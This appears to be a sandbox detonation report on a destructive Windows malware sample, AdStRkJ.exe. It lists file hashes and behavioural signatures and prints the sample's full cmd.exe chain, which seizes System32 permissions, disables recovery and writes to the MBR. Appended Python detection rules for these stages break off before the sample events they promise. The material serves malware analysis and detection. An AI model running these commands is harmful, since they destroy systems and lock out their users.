C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG
| MD5 | bf1e418bd0ce3722fdf6e3a34b263e74 |
| SHA1 | cc3e0531ea8fd5269185efd08c92d33ff7a26693 |
| SHA256 | b71f79d52c61e0fd894972f6adc5c5893279b4828f84149f812fdbc5e606d106 |
| SHA512 | 4b7843d923b03d9e5a747abcbaaada3e8b439c74f1b24cbd2a8f1fd1d0377dc140de94f92cf201021d2526b448db795f2950d3a34514c23cb59b52522e2543c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
| MD5 | 344322223f0ccbea61c08a44531f4c54 |
| SHA1 | d06a1eb002f866f7dde8f71c59bddd7f4e0e7457 |
| SHA256 | c940a6018885a426226df13b481fd6b00c69a1656e53412c0743d5897d5155af |
| SHA512 | e9f3d2dafd6d67e9e32e41e3c86023e631e25734cfdd7f37a035d599855071649a582084f54445d9cbc1d28eb667929cfa0123e4b477de9443a5a1cc096fe9b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0
| MD5 | 63bc86f6c3cc14787ff8a9116e61ce96 |
| SHA1 | 9ac37467054f19ce291a79ac21e0099d018c23dc |
| SHA256 | a340ef5e6a6225531ad4ac2eabb6eaa434bcf0ef6aab77620a8fc19ac27ab80d |
| SHA512 | 4fbd5410f19803b42d9bff49389ff6a63baba4668bbf7e6ea9f5805655004a5a18c57035475e09c91ee5f07bc1ba57b61a1ed44a3c732c93d0db5eca083a8f1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1
| MD5 | 279457fbbb30ce4ddb3ff96b593e0828 |
| SHA1 | 8fadee49ac3fdcc21877c8178113f7f3295fad46 |
| SHA256 | 6a0df2302baf411612dbeddf4d710cb435b917ad4dc43bddd4b0cf174371fa0a |
| SHA512 | 8990aaae9040841aa4e4179eb22161735a2e7d52000a522630c9bdd50c5b2bd0ac0b95d5ec52d052d9518aa7f74a681c4676d9f662086c6520d336ad3d029219 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
| MD5 | fa1af62bdaf3c63591454d2631d5dd6d |
| SHA1 | 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466 |
| SHA256 | 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d |
| SHA512 | 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4952d02b0f2608b6a21a49bc6706078e |
| SHA1 | b5a30eaabadca9db2b3596e32b1c0757365db5b6 |
| SHA256 | 0d181f741156c97c5ca830e4cd2d58f3398f0ab0641fcb261dc85903634ecd97 |
| SHA512 | d56dfd91ff17f7d15991a193637889a5ec1f3995baac2bca3198fa87dd2ed760214cf26ec0e58a3103889f096c6a97b198a092578db633a6dcd39e33585d1660 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6df850440499bf47a8cc3c848c08603c |
| SHA1 | 2b8a8c14381241291eac45302cb3766909f3b532 |
| SHA256 | 1de550200649e2dad5ac2ac6b802346cabd2722f65609a9fb34564939f02039b |
| SHA512 | b236244a2ff0bcf8d935dc479366be51f929b62c97ea2ff4603158815ade1e94b296ec7fe90ca846348a0cea653f96995a75bbc08c4b1ca867066d46a644162d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d252e1947b4f4d720670732a258e1ec8 |
| SHA1 | 6978bec1c8b52fc5278f2a8ae01680bd32dd1986 |
| SHA256 | 50a4117814481e837669f6849c82d9bafbef3b5691e91b0ba45648f5c8a28ffe |
| SHA512 | 88f0089c564af7a20c8dc6ce3b4179d798366f8037e9614fd954f1e96998140b44b021c4d8c13f6a2e74fdd30b8b7952927789d3478e364c21dbfe258bad682e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6954ed3e0e649263e016f545ad96c151 |
| SHA1 | 727e1102dcd1d69eb8a7ea6749cf2559fb075883 |
| SHA256 | 3b3407f9292fc28f38936ad6f0b1f4b61117f419396b93e35bcc457a29d478ff |
| SHA512 | 2cb46c047c53d79f5d664b5ce8aa94a8a9c5bc1c067f52674384af53b4280972622bb34c13c05338ef71705e12accda223616ba0e7d12e4b5194e4abc2ea39fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | a14ba0942c5250220f964a0e9714e60f |
| SHA1 | c1dbb75e0322be720fcc23814d9a6741b175efae |
| SHA256 | ad3650a0da82ce7b464f1989813aecb0554510189a12d5877a6d320406225395 |
| SHA512 | f742f856c4869030eec126c251f277f2a4b8379ee696fd4dd3e5f2aa44fb175a1af97fcc67835bfa6c01b31993e272ef911aa201fee501f3bdcd795f4cf697c6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe599e2a.TMP
| MD5 | eb95a62aa0fb04a2547cf0767a83281b |
| SHA1 | b8c0213e98d3070471bd30a87bf8c875274171c4 |
| SHA256 | a2087dedf94004deccc8998854370ecf3b1c92acc40f4d573a4cba6312c45ffb |
| SHA512 | b841b12965f9bc2b7cdfa56b564fabc82d3101eff88ef9ed992272169e51402889968369d151e3f37d2235a37ff6e4f6968fabed5d03f1b0a7a9d3a88b7ee374 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0e42477e017971631e1a4d1e30220acf |
| SHA1 | 92e8a1ba2d60ace44462a14214f9ca5bd8cf2dc3 |
| SHA256 | 0b78dc0b45f126cea6a5e0dfc1b1c98c9cdbc966a505d3ca00f10ff1db1ad661 |
| SHA512 | e856fe50792158df4e6fe7abc66b62ebd377666aa31fbba5514457d3c943a177f706dfa58ab9ae71e89aa1adc0a44a57f9446fdd33a792c8799933cbfde6ea56 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | c6386f384fab12bdac9346dd2873f5eb |
| SHA1 | be6462efd752a0acae54b66ac5769989c1631f8d |
| SHA256 | a22ca15295fdb399034363bdd7ec8e5c53a3b6b5c4549c36089d24e46598a167 |
| SHA512 | 29ec4a8a455075327fbcf429c712907f8e48915ac7dde665772912a81b96e215b5d11273133d1b9433a9121190685b097277266467bebf72fe875c1f323e592e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 8de2c3401fef13f5c0f8e82a2fb76354 |
| SHA1 | f208974c5f866e071c838d0407a6a72d2d1ef1e9 |
| SHA256 | 3fa1c740fe39c7ac18b90935c9d64505c77ab4b95256356ffaf9c0cdee5f7643 |
| SHA512 | ce357e11fbb1ddfd15be9d2534e392799b94af0c2ce614980e3c9124e4267857989662ed2b7e46e0697d0d3ee222e259f66f5a03d0f321152cb5622f5a8bae5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff877407df56b9eaa5e1f4467f98b577 |
| SHA1 | a641170824630cdd1aec3c3f7578ecc424ccc197 |
| SHA256 | 447cb613bb78b3d8c0c84de5204211dcf3d8fa130660d947c6bbbbdf02f121fb |
| SHA512 | c484dd823c32f5f17753126cd34b0592ca0d4bd3e4bd320af93b8cb9b152e0b52e2fb5ad69455889e1930a18a2d19a343baa6240838389a03adcd4165d463cc6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | cced56344c314d98b862423129163c84 |
| SHA1 | 158732882eece8038df49d5ad978b0c2dfba3fe8 |
| SHA256 | cc929ec822b863b9a5521a2f55d05203f2587271c450f2ee6c79bd6e967078d3 |
| SHA512 | 52174bc0345fedc3cb66b0ab007eb7e1610b41fa8ce8e27cc4323993a59deb6fb7bafc965e0992a834639d5a4d99dfff75891afc3afbe4f448c1e239b766bff2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d37bd45c3ab706cb265b3ccd520bad52 |
| SHA1 | d70b937ac2db8cf93d1a0db398025f61891253c2 |
| SHA256 | a2c316c4407ee15c02e9f612ad2aaeb0e9615c3d7a02344be32aff5c7a4fb8d4 |
| SHA512 | 2f54db9342e1a1fe28c2796480349c81acb122eae041f6f660e8c4797d5230358b9e733ab66f354e8569b554e06779cac91e4ccc2d00880e525df24644094021 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59d45d.TMP
| MD5 | d69c7037eef887eabaa5cd057a9894fa |
| SHA1 | 94cdc8618dc2ac278c8ef2b87a533575439fbd28 |
| SHA256 | c5174c96793851e68591b9167b3730938312732a43a9e9529a5e8ac0669809bf |
| SHA512 | c3b2624481e850383513c21dc206470a9bed46a55d66d454fe90e8a5d30ae80584a4db19a087e800af06cddf30a41c670b94a34334829c2ceba72545c6db000c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | afea75e39305cc3569f99265fcb548ba |
| SHA1 | aa0e9ee9bb9ba93a4c2a645b10c2faf1e84dd2e6 |
| SHA256 | e642ac406facc7a2e6a8bfcc87ee6ec787c80ecf7164e0354a3a025d4e606ba8 |
| SHA512 | e92d0daaa762b38da49df560d48e7d7a4175d87ea5af136012e8ffe1c6556c585ec17cd4f902ce0d6197d4ede808ab5037d20732893a84a85e8e2406c00acf36 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001
| MD5 | 7a204d478c8dfe822bf86f9103bbd9b3 |
| SHA1 | 7114b36ea1588d9372d730b2ee5dec7a3aee36d1 |
| SHA256 | d9134e3cf60db564c49cc181251c7308bc568acf060444c443a90c0f464ebfeb |
| SHA512 | f5fb06a9808e9370a5fb3b926ffa27746ca7942eba36a2f63135168218e326abc74195453b9bcd8a045d5870a71b7f250dfc281515c7fa51857410acb316763e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | dccf12096bb297369451afc6db16a236 |
| SHA1 | 571bc48377a985f63fc7899142a7224e24aa4c8f |
| SHA256 | 7715812d50fd87d35cbcb910abad64fcc94360346e7728011c71820c8bc73a54 |
| SHA512 | d14341f35d251ad4870d686a810feba0c1b802e552c13a050f34af51aa491645d4cad9dc72a8d664a567844d54ff758c09165e41f8cc9c9a03966dbc91efe8c1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | 00494c10001e5d3506062fe05b3be14b |
| SHA1 | b6863374fbf468a7e7ed8c5c229b6b47e9e158a9 |
| SHA256 | a474b4dbc3de7f01ae792b12f5950955fc94e31fc77c523d1676590b244c2a65 |
| SHA512 | 9f68ffec822ef1bb4c479ff206d65305dc17b498caa5821c9a9da70111bf457eee594894189fa9ea4e50bba50bac876024d3a82349d35ab42adf523870fbbbde |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | e9fec90d4af8805b11e69a53eb21aca8 |
| SHA1 | e546322eb933862fa653f20fd4bd38bc6c3375a1 |
| SHA256 | e3801b7cfce7b9fc9ad44dc8569bb007c4cd934fdb7b4c3fea8c23a79e4775b6 |
| SHA512 | 9ee5f9f118d869b2f7ae5d30903cc081710a7fb2f3912fef3bc178e6ad9bd3556f227fc6db940def5049f855938ebc4e2d4d855afbeac5b1ef2305642f8a7b95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | 1862a084867804c6446e31f801a6ca10 |
| SHA1 | 9f0addd7e5407ad6adc297d83e71864bf5d234ef |
| SHA256 | fddbb692490ae3a98abc3505688261ed1d9de4440367b2b83dfc26237dab2637 |
| SHA512 | 110160df85746bedc1b5c56c9837a0e6850f47b27b18b804077179821932ea5e4317d1e42407304d3b96f9848504f0ca879c02030510f509d6409285aa90d144 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | d632f6c98568d23b5951fc8b30445205 |
| SHA1 | 5de9f2b13b104e2beedfaae0fd87bd6eebd59a28 |
| SHA256 | 4df24a47fc341108a2ebe26b8f07cc95c747bb0eef303e51b67d34ccd76165a1 |
| SHA512 | b85b1e4488df589a9003ede76c1efc71f97900701caf4c9740cee88aa1e3a19e5080d986c82d82e7b73a8026af801691523d238f26a3f6afd8bf7c95d4f15a1a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe59f1f7.TMP
| MD5 | e45b6ce8db578ed000e07f804140e2c9 |
| SHA1 | 3cc3992f773c9b2923c0f7d1e6769826a1651c1b |
| SHA256 | 70a3d26a640ba944be6f01f2cb22bd5d8df6956aff50168ee1c2eae5fb831224 |
| SHA512 | 1f23f7831bdd526665943e894d82369c32035a3fa67160c5b05380657b7d63502696f77a4dfbe8a9e300059c52b56f070e90fbf74bf890ff40576ed14fb87fae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 20c445cbe3e4ce22a27adb4c9e6abc31 |
| SHA1 | 20720f5abfd8fc516ba11d5431d7878a99ab0209 |
| SHA256 | a64877eb7b067cf0a182dd5e7422f44248178a8dc9269334df4284338d08fe10 |
| SHA512 | 2b9270ac5117361553a356e6b2ae133f01d56bce53bb673f81d177eb91e9bed65ce5fd49dea20f6fb6cfee0904a8af18b885a31b7b92af143dec0d9db254ec1e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\06970815-d0fd-4f9a-b1b1-d33b27eabdd7\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 6bd349906eb33fb2634187f3fdab856f |
| SHA1 | 8e59b494932ef51a3c871492b298d820e7e74e12 |
| SHA256 | eafbc00fb7251d5bed88dd2dae2b5ee6d6b71045b63d1fbf924a017637dac253 |
| SHA512 | ab7c9ccb57458c644cc63bff792b662d1c65db5ab03cf9bda928cfdfae24abe9a6c352c7593db5d068867e9c2baa66a0d173b00e0b532f0ce458a8dcd75843fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012
| MD5 | 56cf88a250e483d0b17bd6b3a5cf245d |
| SHA1 | 7ee18462db98275a742167c02a7bcb9b9cd9ed56 |
| SHA256 | 287c5696a5e55b44b025c7356abaeaae0859487c581a26ccb5ca02fd6b7fea9a |
| SHA512 | 23ff85c0e6e4c073fbacea6325663ab4a60f6d5226cfb57bdf8ac05117d01ba4a324650be599d4cb3b3081b31cbcb4ce9555fec6ffacf8376a7269f406b09e00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 1977775f015b0adcf4d4e7aaadd5466d |
| SHA1 | e2ceaa2724fc7681e43ede7dd30406ac228f6359 |
| SHA256 | 378f65db2169da56cba03d5ccf836a9ccc5121cb43d908230dd1040e90c3a4ba |
| SHA512 | f9b63fb8a7dcbebd672326c7da50539fa129ea85d5e1a53e5b37e2cb41d71867702c6f7460f9b4bd308561ecea4e3c4fc530b46e7a24ea3c53cb75121903b91a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d647b9c29dd523d544c881fc1c716794 |
| SHA1 | 160ce2ccc86bf07797eae9539a7a7891ff453f68 |
| SHA256 | a6fcc34b62b1c8a6b8bf12e8b1c7473806c4e198c5ffa7aa63f996037afb80ce |
| SHA512 | 884ad7f53599c97cf6ada99d21f5e64735c68d39c567541f4a909db6ab6fd65acbc19b95c6d6bd6ba165711d8cecf5430a6b52ccb14309c89c4fc2101750743c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 92959fa9757bf93c4b4b99a3a807a123 |
| SHA1 | c22cd28c96219036beeeabe09e9f910e50dd812d |
| SHA256 | 7a3500ad86f6ece190ed078a8687f24e00af4a8160bc3429bc17d75a07411dfa |
| SHA512 | 57a206f5f7d0288f2b0470031448d3b5feecd7358c2f251394bcf95608bc86ec20aaa0497bbbe1abef9c4d9c50ca5dcb2c4aa25dcd771b2d3006bf3a290d8c50 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | de2495686c6ca82f4a25505c1e652861 |
| SHA1 | fc2771120c984a790778a7f9ccbf2ed129273afe |
| SHA256 | 8e99515d955278ffa8fb6646980e2a18b884447f085265f72270c17513a02fae |
| SHA512 | 493bf434aad941ec0f086a09c6b7c1ecb4aec602f2bacae488e50387e9146f8c507d700148fa7c48fba3a5e6bfc2d98fadeb543887e166aa1d630b6aa8e28ec8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 5033cdbd0ed9622d2570d883b04b4724 |
| SHA1 | 74d961b02af77e67d855f8a2deea0bbb6ac16bba |
| SHA256 | d9da5fb3912e8bbbc006a2c716b6d51f672374584cba5edb106bd3cc9679518b |
| SHA512 | 49ad2f61cc6b1d7531050c2234237b6f9b1d2822baf3519977963377447d9f3898f3701f18c11f68ebff836330ee415a5c076eb47c97c3384d881b5a50f9d744 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a5d6c1761f943c0545461dc0039380e6 |
| SHA1 | 64033d53d8aabed06559ebbebf92299ac6f44d01 |
| SHA256 | 1e8e8444728d86de5966a57ef4742b3497537fde68cc9b2ae3727e6bd26494ce |
| SHA512 | 09e2c099e4809258b3045064a1cc7c5ae7ff606ed4d39752b12c3e8adb8945ef7786705be52b914a38dc4d577962896ec70a5e177b5cbd62405a625dc5b12ac9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e20b7581-2e51-4d25-9e5b-0b6449ed3a8b\index-dir\the-real-index~RFe5a9ba5.TMP
| MD5 | 7f69422f82441a5e2899be4b0665211b |
| SHA1 | e7840a3be7eb48aeacf7ead1ddc92639d7a50e90 |
| SHA256 | 83442da987bfb0c761866a4a773d9dddd7b6fb9a0b56179e202c209be8b366df |
| SHA512 | 72b3b4d4ebcfc03886a18c28c6bbdd6b0b8ce75603ec8e941c10b812f6e879d9a7d51e10e7af8f9e3a019ef4f90595b46396872c8bfa7a339448f9d3c0528c08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\e20b7581-2e51-4d25-9e5b-0b6449ed3a8b\index-dir\the-real-index
| MD5 | 88302b60088b2a8929346f3a955117bb |
| SHA1 | f361e3c213c3049fdfa2081e7fe8a49b1148169c |
| SHA256 | 2067635aeadb95277d65c10a5a0f9853d968fb8d52bbc9f1062e2f6c972100b2 |
| SHA512 | ea5ec595d14c0cad075551237bbed5150a6b64df40e6ac62df656059b25a112f5f7df86d661541dc4964644f250483c0903ce589bf2e86a9ba1b835b531df268 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | 8021cb0fe3e7f40e59c39554e864a9ae |
| SHA1 | b6c44e8bfb3950fa9fe735e311dec1a4b7cbe887 |
| SHA256 | 42e951da1e02f12379d747a01e2c103188e2b1ce199cca549487f5ffc64fbb51 |
| SHA512 | 1dc41c9901f271db1083c00bfef9bc09388dd6d21cd6063bac4319c6ec01cecebe86cb419292d6b55c5ff55b6ef7815585baa6c3c5de7fe864fff70d09290b71 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:32
Platform
win7-20240221-en
Max time kernel
132s
Max time network
125s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows NT 32\MBR.exe | N/A |
| N/A | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files\Windows NT 32\MBR.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\sfc.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File created | C:\Windows\System32\taskkill.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\System32\notepad.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Windows\System32\notepad.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows NT 32\sound.wav | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\MBR.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT 32\lock_files.exe | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Windows NT 32\AdStRkJ_sound.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe
"C:\Users\Admin\AppData\Local\Temp\AdStRkJ.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && title Critical process && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && reagentc.exe /disable && Exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
C:\Program Files\Windows NT 32\MBR.exe
"C:\Program Files\Windows NT 32\MBR.exe"
C:\Program Files\Windows NT 32\AdStRkJ_sound.exe
"C:\Program Files\Windows NT 32\AdStRkJ_sound.exe"
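The process tree above is the whole destructive chain in order: a policy lockout (DisableRegistryTools), ownership and ACL takeover of System32 and drivers with takeown/icacls, Windows RE disabled with reagentc, system binaries (sfc.exe, taskkill.exe, notepad.exe) replaced from a %TEMP% dropper, and finally a raw write handle to PhysicalDrive0. The following is an added example, not part of the sandbox report: a small rule set that replays the same behaviour over constructed Sysmon-style events (the event dictionaries, field names and PIDs are assumptions modelled on the report, not the sandbox's own data format) and returns one finding per stage, so the chain can be recognised from telemetry rather than from a detonation. A benign icacls on a user folder and ReAgentc's own write to ReAgent.xml are included to show what the rules deliberately do not flag.

```python
"""Rule-based triage of endpoint events modelled on the behavioral5 run.

Added example: event shape (Sysmon-like dicts) and PIDs are assumptions; the
rules encode only the behaviour visible in the report's process tree.
"""
import re
from dataclasses import dataclass

SYSTEM32 = "c:\\windows\\system32"
LOCKOUT_VALUES = {"disableregistrytools", "disabletaskmgr"}
POLICY_KEY = "\\software\\microsoft\\windows\\currentversion\\policies\\system"


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str  # MITRE ATT&CK technique ID
    pid: int
    evidence: str


def _norm(path):
    # Case-fold and unify the NT (\??\) and Win32 (\\.\) device prefixes.
    p = path.strip().strip('"').lower()
    return p.replace("\\??\\", "\\\\.\\")


def _argv(cmdline):
    # Whitespace split that keeps a quoted image path as one token.
    return [_norm(t) for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def rule_system32_acl_takeover(ev):
    # takeown /f <System32 path>, or icacls <System32 path> /grant <user>:F
    if ev["event"] != "process_create":
        return None
    argv = _argv(ev["cmdline"])
    image = argv[0].rsplit("\\", 1)[-1].removesuffix(".exe") if argv else ""
    if image not in ("takeown", "icacls"):
        return None
    if not any(a.startswith(SYSTEM32) for a in argv[1:]):
        return None
    if image == "takeown" and "/f" not in argv:
        return None
    if image == "icacls" and not (any(a.startswith("/grant") for a in argv)
                                  and any(a.endswith(":f") for a in argv)):
        return None
    return Finding("system32_acl_takeover", "T1222.001", ev["pid"], ev["cmdline"])


def rule_recovery_disabled(ev):
    # reagentc.exe /disable turns off the Windows Recovery Environment.
    if ev["event"] != "process_create":
        return None
    argv = _argv(ev["cmdline"])
    image = argv[0].rsplit("\\", 1)[-1].removesuffix(".exe") if argv else ""
    if image == "reagentc" and "/disable" in argv:
        return Finding("recovery_disabled", "T1490", ev["pid"], ev["cmdline"])
    return None


def rule_policy_lockout(ev):
    # HKU\<SID>\...\Policies\System\DisableRegistryTools (or DisableTaskMgr) = 1
    if ev["event"] != "registry_set" or not ev["key"].lower().endswith(POLICY_KEY):
        return None
    if ev["value"].lower() not in LOCKOUT_VALUES or str(ev["data"]) != "1":
        return None
    return Finding("policy_lockout", "T1112", ev["pid"], f'{ev["value"]} = {ev["data"]}')


def rule_system_binary_overwrite(ev):
    # An .exe created directly under System32 by a process outside C:\Windows.
    if ev["event"] != "file_create":
        return None
    target, writer = _norm(ev["target"]), _norm(ev["image"])
    if not (target.startswith(SYSTEM32 + "\\") and target.endswith(".exe")):
        return None
    if writer.startswith("c:\\windows\\"):
        return None  # servicing by a Windows component is out of scope here
    return Finding("system_binary_overwrite", "T1036", ev["pid"], ev["target"])


def rule_raw_disk_write(ev):
    # A write handle to \\.\PhysicalDriveN bypasses the filesystem (MBR access).
    if ev["event"] != "raw_access":
        return None
    if _norm(ev["target"]).startswith("\\\\.\\physicaldrive"):
        return Finding("raw_disk_write", "T1561.002", ev["pid"], ev["target"])
    return None


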